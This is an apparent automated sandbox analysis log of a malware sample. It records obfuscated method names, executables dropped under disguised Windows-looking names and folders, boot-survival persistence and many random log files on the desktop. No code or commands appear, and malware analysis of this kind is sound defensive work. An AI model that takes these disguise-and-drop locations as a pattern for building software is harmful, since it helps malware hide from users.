Source: 67VB5TS184.exe, Yuvg5kmTihElMDb8qVu.cs	High entropy of concatenated method names: 'KZ3', 'imethod_0', 'vmethod_0', 'KBYr5mQ0RHj', 'pwNrmrMWeiv', 'C8X58UroR7LxF5idduhF', 'I32Dh9robc2YVB99G0Et', 'tBRCOyroAgx0Dc4JbNSZ', 'Pvb9WUro3Aj0kacICdVy', 'ysXW6UroKMFc4RCNexGV'
Source: 67VB5TS184.exe, ueaNUk6WaMagUFEHsZ7.cs	High entropy of concatenated method names: 'HRF6laA9T1', 'DFy65Ti3QV', 'tk06JsBVGH', 'LfN6Ucla0Z', 'zWNU9QrfODBmwalKdFR4', 'FX3MfRrfQdA7nxZdyGqC', 'TbbFyUrfN8PPWQE0u5qD', 'Rm77oCrfnsVFOVBGcs0w', 'Xe6m6vrfV0rTyuNAEkra', 'gLWVFhrfeNCCajCdknjC'
Source: 67VB5TS184.exe, D16hl2Leo2kHNkESV66.cs	High entropy of concatenated method names: 'p3kLvGZHe8', 'ygdLoEk8iS', 'OW4LDWGoAJ', 'LTSLTWDVmd', 'qV3LXsUrKk', 'l9ELguiZ5L', 'qWgLqEM5sM', 'JCwLtWk7ci', 'eewL4eIuTa', 'hanLc53taY'
Source: 67VB5TS184.exe, u2fAWj3dTqQWauIhUV.cs	High entropy of concatenated method names: 'IndexOf', 'Insert', 'RemoveAt', 'get_Item', 'set_Item', 'method_2', 'Add', 'Clear', 'Contains', 'klRdtgRRG'
Source: 67VB5TS184.exe, DjkDM70EHBa7hTVkppe.cs	High entropy of concatenated method names: 'JFG00Qso9O', 'y4b07OtjGT', 'LWJ0udfFJ7', 'xYj0fgJsvF', 'gnP0vGolJJ', 'VUcTcwrdrBWkNtD1qNH9', 'G8jSySrKzAjXweDWcXSk', 'PgdHXfrdkAq4Wj0GTjTS', 'bbMeb3rd6rr2ehgY1gNv', 'unJSiardBnEvOAU8FlGJ'
Source: 67VB5TS184.exe, sw8jN8fIEDRdytgpUMJ.cs	High entropy of concatenated method names: 'Mqlf1JuvLh', 'eVyfi9jKKf', 'Y5IfplGnIJ', 'o1SfFjeG03', 'Tf0fLtL4yf', 'xIm236ryFq0rRGeAHgNy', 'kb0ScZryickRIheR2Ytu', 'DsAeuvryp1yJ08Ed4dLu', 'Kd0y25ryLeKkQ5pywps1', 'sHcxcbryYsvEBWObX9i8'

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\wOaGdxSj.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\DTgFmlup.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\dwnaKsIT.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\krQkZgRp.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\RhNXkKhf.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\zssgqxCT.log	Jump to dropped file
Source: C:\Users\user\Desktop\67VB5TS184.exe	File created: C:\Windows\SysWOW64\sr-Latn-RS\hjAOLvfTLePJensZtANoSVrh.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\MpypukBp.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\RpfWQkOw.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\jwizTxuZ.log	Jump to dropped file
Source: C:\Users\user\Desktop\67VB5TS184.exe	File created: C:\Users\Default\hjAOLvfTLePJensZtANoSVrh.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\qdPghqvM.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\WQhnzdgR.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\YxKDZEBV.log	Jump to dropped file
Source: C:\Users\user\Desktop\67VB5TS184.exe	File created: C:\Program Files (x86)\Windows Sidebar\Gadgets\hjAOLvfTLePJensZtANoSVrh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\67VB5TS184.exe	File created: C:\Users\user\Desktop\DhBojCdn.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\xevZNWFO.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\whTRrWrT.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\uajAJJWW.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\EDFigHLC.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\OlLEhJlc.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\nfGqtVNB.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\MhOXPBbk.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\rRFIZzDC.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\LPiGkDiH.log	Jump to dropped file
Source: C:\Users\user\Desktop\67VB5TS184.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\TzBXQCtx.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\pAmkddqh.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\HGMGgHJP.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\FgXXGzqG.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\inwSqFnU.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\YEdCGdin.log	Jump to dropped file
Source: C:\Users\user\Desktop\67VB5TS184.exe	File created: C:\Users\user\Desktop\EVFwVPZl.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\OJgNpsGn.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\GJkyKHuU.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\ybRYxLPz.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\wYfqbcKE.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\dWzlEqNV.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\JTcevqgv.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\kdUIYmJG.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\BJKEmTPo.log	Jump to dropped file
Source: C:\Users\user\Desktop\67VB5TS184.exe	File created: C:\Program Files (x86)\WindowsPowerShell\Modules\SystemSettings.exe	Jump to dropped file
Source: C:\Users\user\Desktop\67VB5TS184.exe	File created: C:\Users\user\Desktop\iKDhQNdY.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\UtqvUxyo.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\UHGUfCbd.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\RwkTfkwc.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\wQvXwsjz.log	Jump to dropped file
Source: C:\Users\user\Desktop\67VB5TS184.exe	File created: C:\Users\user\Desktop\VtdtDXyC.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\PetFAjEL.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\IJkognUh.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\DdlpkQmL.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\JNwXPUdL.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\zNBzlFlK.log	Jump to dropped file

Source: C:\Users\user\Desktop\67VB5TS184.exe

File created: C:\Users\Default\hjAOLvfTLePJensZtANoSVrh.exe

Jump to dropped file

Source: C:\Users\user\Desktop\67VB5TS184.exe

File created: C:\Windows\SysWOW64\sr-Latn-RS\hjAOLvfTLePJensZtANoSVrh.exe

Jump to dropped file

Source: C:\Users\user\Desktop\67VB5TS184.exe	File created: C:\Users\user\Desktop\EVFwVPZl.log	Jump to dropped file
Source: C:\Users\user\Desktop\67VB5TS184.exe	File created: C:\Users\user\Desktop\VtdtDXyC.log	Jump to dropped file
Source: C:\Users\user\Desktop\67VB5TS184.exe	File created: C:\Users\user\Desktop\DhBojCdn.log	Jump to dropped file
Source: C:\Users\user\Desktop\67VB5TS184.exe	File created: C:\Users\user\Desktop\iKDhQNdY.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\kdUIYmJG.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\wOaGdxSj.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\nfGqtVNB.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\dwnaKsIT.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\qdPghqvM.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\DTgFmlup.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\BJKEmTPo.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\jwizTxuZ.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\zssgqxCT.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\UHGUfCbd.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\RwkTfkwc.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\JTcevqgv.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\wYfqbcKE.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\IJkognUh.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\ybRYxLPz.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\wQvXwsjz.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\DdlpkQmL.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\YxKDZEBV.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\OJgNpsGn.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\FgXXGzqG.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\PetFAjEL.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\rRFIZzDC.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\inwSqFnU.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\YEdCGdin.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\whTRrWrT.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\OlLEhJlc.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\xevZNWFO.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\pAmkddqh.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\JNwXPUdL.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\dWzlEqNV.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\UtqvUxyo.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\LPiGkDiH.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\RhNXkKhf.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\uajAJJWW.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\krQkZgRp.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\zNBzlFlK.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\GJkyKHuU.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\TzBXQCtx.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\RpfWQkOw.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\HGMGgHJP.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\MpypukBp.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\WQhnzdgR.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\MhOXPBbk.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File created: C:\Users\user\Desktop\EDFigHLC.log	Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Users\user\Desktop\67VB5TS184.exe

File created: C:\Users\Default\hjAOLvfTLePJensZtANoSVrh.exe

Jump to dropped file

Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
